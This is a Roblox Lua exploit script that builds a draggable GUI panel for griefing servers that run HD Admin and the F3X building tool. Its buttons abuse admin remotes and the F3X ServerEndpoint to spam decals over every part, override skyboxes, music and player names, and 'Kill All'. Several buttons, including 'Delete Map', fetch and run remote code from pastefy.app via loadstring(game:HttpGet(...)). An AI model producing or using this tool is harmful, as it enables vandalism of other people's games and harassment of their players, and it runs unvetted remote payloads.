local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommandSilent
local Players = game:GetService("Players")
local player = game.Players.LocalPlayer
local char = player.Character
local backpack = player.Backpack
local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "Project"
gui.ResetOnSpawn = false

local frame = Instance.new("Frame", gui)
frame.Position = UDim2.new(0, 350, 0, 50)
frame.Size = UDim2.new(0, 150, 0, 220)
frame.BackgroundColor3 = Color3.new(0, 0, 0)
frame.Active = true
frame.Draggable = true
frame.BackgroundTransparency = 0
Instance.new("UIStroke", frame).Color =  Color3.new(5, 5, 5)
Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 3)

local frame2 = Instance.new("Frame", frame)
frame2.Position = UDim2.new(0, 0, 0, 0)
frame2.Size = UDim2.new(0, 150, 0, 220)
frame2.BackgroundColor3 = Color3.new(0, 0, 0)
Instance.new("UICorner", frame2).CornerRadius = UDim.new(0, 3)

local KP = Instance.new("Frame", frame2)
KP.Position = UDim2.new(0, 0, 0, 35)
KP.Size = UDim2.new(0, 150, 0, 1)
KP.BackgroundColor3 = Color3.new(1, 1, 1)
KP.BorderSizePixel = 0

local KP2 = Instance.new("Frame", frame2)
KP2.Position = UDim2.new(0, 0, 0, 185)
KP2.Size = UDim2.new(0, 150, 0, 1)
KP2.BackgroundColor3 = Color3.new(1, 1, 1)
KP2.BorderSizePixel = 0

local toggle = Instance.new("TextButton", frame)
toggle.Position = UDim2.new(0, 122, 0, 8)
toggle.Size = UDim2.new(0, 20, 0, 20)
toggle.BackgroundColor3 = Color3.new(0, 0, 0)
toggle.Text = "+"
toggle.Font = Enum.Font.Gotham
toggle.TextColor3 = Color3.new(255, 255, 255)
toggle.TextSize = 19

local Uis = Instance.new("UIStroke", toggle)
Uis.Color = Color3.new(1, 1, 1)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", toggle).CornerRadius = UDim.new(0, 3)

local scroll = Instance.new("ScrollingFrame", frame2)
scroll.Size = UDim2.new(0, 148, 0, 146)
scroll.Position = UDim2.new(0, 1, 0, 37)
scroll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
scroll.ScrollBarThickness = 0
scroll.CanvasSize = UDim2.new(0, 0, 4, 0)
scroll.BackgroundTransparency = 0
Instance.new("UIStroke", scroll).Color =  Color3.new(0, 0, 0)

local cmdb2 = Instance.new("TextButton", frame2)
cmdb2.Position = UDim2.new(0, 118, 0, 188)
cmdb2.Size = UDim2.new(0, 30, 0, 30)
cmdb2.BackgroundColor3 = Color3.new(0, 0, 0)
cmdb2.Text = "Cmdbar2"
cmdb2.Font = Enum.Font.Gotham
cmdb2.TextColor3 = Color3.new(255, 255, 255)
cmdb2.TextSize = 6

local Uis = Instance.new("UIStroke", cmdb2)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", cmdb2).CornerRadius = UDim.new(0, 1)

local Box = Instance.new("TextBox", frame2)
Box.PlaceholderText = "Text/ID..."
Box.Position = UDim2.new(0, 35, 0, 188)
Box.Size = UDim2.new(0, 80, 0, 30)
Box.TextSize = 12
Box.TextColor3 = Color3.new(1, 1, 1)
Box.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Box.Font = Enum.Font.Gotham
Box.Text = "129988826233934"
Box.ClearTextOnFocus = true
Box.TextWrapped = true

local Uis = Instance.new("UIStroke", Box)
Uis.Color = Color3.new(1, 1, 1)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", Box).CornerRadius = UDim.new(0, 2)

local f3x = Instance.new("TextButton", frame2)
f3x.Position = UDim2.new(0, 2, 0, 188)
f3x.Size = UDim2.new(0, 30, 0, 30)
f3x.BackgroundColor3 = Color3.new(0, 0, 0)
f3x.Text = "F3X"
f3x.Font = Enum.Font.Gotham
f3x.TextColor3 = Color3.new(255, 255, 255)
f3x.TextSize = 14

local Uis = Instance.new("UIStroke", f3x)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", f3x).CornerRadius = UDim.new(0, 1)

local Sky = Instance.new("TextButton", scroll)
Sky.Position = UDim2.new(0, 3, 0, 3)
Sky.Size = UDim2.new(0, 70, 0, 35)
Sky.BackgroundColor3 = Color3.new(0, 0, 0)
Sky.Text = "Skybox"
Sky.Font = Enum.Font.Gotham
Sky.TextColor3 = Color3.new(255, 255, 255)
Sky.TextSize = 14

local Uis = Instance.new("UIStroke", Sky)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", Sky).CornerRadius = UDim.new(0, 3)

local Decal = Instance.new("TextButton", scroll)
Decal.Position = UDim2.new(0, 76, 0, 3)
Decal.Size = UDim2.new(0, 70, 0, 35)
Decal.BackgroundColor3 = Color3.new(0, 0, 0)
Decal.Text = "Decal"
Decal.Font = Enum.Font.Gotham
Decal.TextColor3 = Color3.new(255, 255, 255)
Decal.TextSize = 14

local Uis = Instance.new("UIStroke", Decal)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", Decal).CornerRadius = UDim.new(0, 3)

local s = Instance.new("TextButton", scroll)
s.Position = UDim2.new(0, 3, 0, 41)
s.Size = UDim2.new(0, 70, 0, 35)
s.BackgroundColor3 = Color3.new(0, 0, 0)
s.Text = "Sound"
s.Font = Enum.Font.Gotham
s.TextColor3 = Color3.new(255, 255, 255)
s.TextSize = 14

local Uis = Instance.new("UIStroke", s)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", s).CornerRadius = UDim.new(0, 3)

local board = Instance.new("TextButton", scroll)
board.Position = UDim2.new(0, 76, 0, 41)
board.Size = UDim2.new(0, 70, 0, 35)
board.BackgroundColor3 = Color3.new(0, 0, 0)
board.Text = "Billboard"
board.Font = Enum.Font.Gotham
board.TextColor3 = Color3.new(255, 255, 255)
board.TextSize = 14

local Uis = Instance.new("UIStroke", board)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", board).CornerRadius = UDim.new(0, 3)

local chr = Instance.new("TextButton", scroll)
chr.Position = UDim2.new(0, 3, 0, 79)
chr.Size = UDim2.new(0, 70, 0, 35)
chr.BackgroundColor3 = Color3.new(0, 0, 0)
chr.Text = "Char All"
chr.Font = Enum.Font.Gotham
chr.TextColor3 = Color3.new(255, 255, 255)
chr.TextSize = 14

local Uis = Instance.new("UIStroke", chr)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", chr).CornerRadius = UDim.new(0, 3)

local base = Instance.new("TextButton", scroll)
base.Position = UDim2.new(0, 76, 0, 79)
base.Size = UDim2.new(0, 70, 0, 35)
base.BackgroundColor3 = Color3.new(0, 0, 0)
base.Text = "Baseplate"
base.Font = Enum.Font.Gotham
base.TextColor3 = Color3.new(255, 255, 255)
base.TextSize = 14

local Uis = Instance.new("UIStroke", base)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", base).CornerRadius = UDim.new(0, 3)

local kill = Instance.new("TextButton", scroll)
kill.Position = UDim2.new(0, 3, 0, 117)
kill.Size = UDim2.new(0, 70, 0, 35)
kill.BackgroundColor3 = Color3.new(0, 0, 0)
kill.Text = "Kill All"
kill.Font = Enum.Font.Gotham
kill.TextColor3 = Color3.new(255, 255, 255)
kill.TextSize = 14

local Uis = Instance.new("UIStroke", kill)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", kill).CornerRadius = UDim.new(0, 3)

local color = Instance.new("TextButton", scroll)
color.Position = UDim2.new(0, 76, 0, 117)
color.Size = UDim2.new(0, 70, 0, 35)
color.BackgroundColor3 = Color3.new(0, 0, 0)
color.Text = "Color Part"
color.Font = Enum.Font.Gotham
color.TextColor3 = Color3.new(255, 255, 255)
color.TextSize = 14

local Uis = Instance.new("UIStroke", color)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", color).CornerRadius = UDim.new(0, 3)

local unc = Instance.new("TextButton", scroll)
unc.Position = UDim2.new(0, 3, 0, 155)
unc.Size = UDim2.new(0, 143, 0, 35)
unc.BackgroundColor3 = Color3.new(0, 0, 0)
unc.Text = "UnAnchor"
unc.Font = Enum.Font.Gotham
unc.TextColor3 = Color3.new(255, 255, 255)
unc.TextSize = 14

local Uis = Instance.new("UIStroke", unc)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", unc).CornerRadius = UDim.new(0, 3)

local delete = Instance.new("TextButton", scroll)
delete.Position = UDim2.new(0, 3, 0, 193)
delete.Size = UDim2.new(0, 70, 0, 35)
delete.BackgroundColor3 = Color3.new(0, 0, 0)
delete.Text = "Delete Map"
delete.Font = Enum.Font.Gotham
delete.TextColor3 = Color3.new(255, 255, 255)
delete.TextSize = 12

local Uis = Instance.new("UIStroke", delete)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", delete).CornerRadius = UDim.new(0, 3)

local nuke = Instance.new("TextButton", scroll)
nuke.Position = UDim2.new(0, 76, 0, 193)
nuke.Size = UDim2.new(0, 70, 0, 35)
nuke.BackgroundColor3 = Color3.new(0, 0, 0)
nuke.Text = "Nuke"
nuke.Font = Enum.Font.Gotham
nuke.TextColor3 = Color3.new(255, 255, 255)
nuke.TextSize = 14

local Uis = Instance.new("UIStroke", nuke)
Uis.Color = Color3.new(255, 255, 255)
Uis.Thickness = 1
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", nuke).CornerRadius = UDim.new(0, 3)

-- Function
toggle.MouseButton1Click:Connect(function()
if frame2.Visible then
    frame2.Visible = false
    frame:TweenSize(UDim2.new(0, 150, 0, 35), "Out", "Quart", 0.4, true)
else
    frame:TweenSize(UDim2.new(0, 150, 0, 220), "Out", "Quart", 0.4, true)
wait(0.2)
    frame2.Visible = true
    end
end)

f3x.MouseButton1Click:Connect(function()
		RequestCommand:InvokeServer(";btools")
end)

cmdb2.MouseButton1Click:Connect(function()
		RequestCommand:InvokeServer(";cmdbar2")
end)

Sky.MouseButton1Click:Connect(function()
local function getf3x()
         for _, v in ipairs(backpack:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         for _, v in ipairs(char:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         return nil
      end
      local f3x = getf3x()
      if not f3x then
         warn("you dont have f3x")
    end
      local syncapi = f3x.SyncAPI
      local serverendpoint = syncapi.ServerEndpoint
      local function sky()
         spawn(function()
            local position = char.Head.Position
            local part = serverendpoint:InvokeServer("CreatePart", "Normal", CFrame.new(position + Vector3.new(0, 2, 0)), workspace)
            local args = {
               [1] = "CreateMeshes",
               [2] = {
                  [1] = {
                     ["Part"] = part
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            local args = {
               [1] = "SyncMesh",
               [2] = {
                  [1] = {
                     ["Part"] = part,
                     ["MeshId"] = "rbxassetid://8006679977"
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            local args = {
               [1] = "SyncMesh",
               [2] = {
                  [1] = {
                     ["Part"] = part,
                     ["Scale"] = Vector3.new(500, 500, 500)
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            local args = {
               [1] = "SyncMesh",
               [2] = {
                  [1] = {
                     ["Part"] = part,
                     ["TextureId"] = "rbxassetid://"..Box.Text
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            name(part, "Sky")
            lock(part, true)
            setcollision(part, false)
      end)
   end
   sky()
end)

Decal.MouseButton1Click:Connect(function()
local function getf3x()
         for _, v in ipairs(backpack:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         for _, v in ipairs(char:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         return nil
      end
      local f3x = getf3x()
      if not f3x then
         warn("you dont have f3x")
    end
      local syncapi = f3x.SyncAPI
      local serverendpoint = syncapi.ServerEndpoint
      local function createdecal(part, side)
         local args = {
            [1] = "CreateTextures",
            [2] = {
               [1] = {
                  ["Part"] = part,
                  ["Face"] = side,
                  ["TextureType"] = "Decal"
               }
            }
         }
         serverendpoint:InvokeServer(unpack(args))
      end
      local function setdecal(part, asset, side)
         local args = {
            [1] = "SyncTexture",
            [2] = {
               [1] = {
                  ["Part"] = part,
                  ["Face"] = side,
                  ["TextureType"] = "Decal",
                  ["Texture"] = "rbxassetid://".. asset
               }
            }
         }
         serverendpoint:InvokeServer(unpack(args))
      end
      local function decalspam()
         local decalid = Box.Text
         for _, v in ipairs(workspace:GetDescendants()) do
            if v:IsA("BasePart") or v:IsA("UnionOperation") then
               spawn(function()
                  createdecal(v, Enum.NormalId.Front)
                  createdecal(v, Enum.NormalId.Back)
                  createdecal(v, Enum.NormalId.Left)
                  createdecal(v, Enum.NormalId.Right)
                  createdecal(v, Enum.NormalId.Bottom)
                  createdecal(v, Enum.NormalId.Top)
                  setdecal(v, decalid, Enum.NormalId.Front)
                  setdecal(v, decalid, Enum.NormalId.Back)
                  setdecal(v, decalid, Enum.NormalId.Left)
                  setdecal(v, decalid, Enum.NormalId.Right)
                  setdecal(v, decalid, Enum.NormalId.Bottom)
                  setdecal(v, decalid, Enum.NormalId.Top)
            end)
         end
      end
   end
   decalspam()
end)

s.MouseButton1Click:Connect(function()
		RequestCommand:InvokeServer(";music "..Box.Text)
end)

board.MouseButton1Click:Connect(function()
		RequestCommand:InvokeServer(";name all "..Box.Text)
		RequestCommand:InvokeServer(";titler all "..Box.Text)
		RequestCommand:InvokeServer(";ctag all "..Box.Text.." red")
		RequestCommand:InvokeServer(";cname all "..Box.Text.." red")
end)

chr.MouseButton1Click:Connect(function()
		RequestCommand:InvokeServer(";char all "..Box.Text)
end)

base.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/A9Yzicrs/raw"))();
end)

kill.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/bsfsgJnD/raw"))();
end)

color.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/kzTbADqG/raw"))();
end)

unc.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/loZZ2WYK/raw"))();
end)

delete.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/pnJkjxAs/raw"))();
end)

nuke.MouseButton1Click:Connect(function()

end)
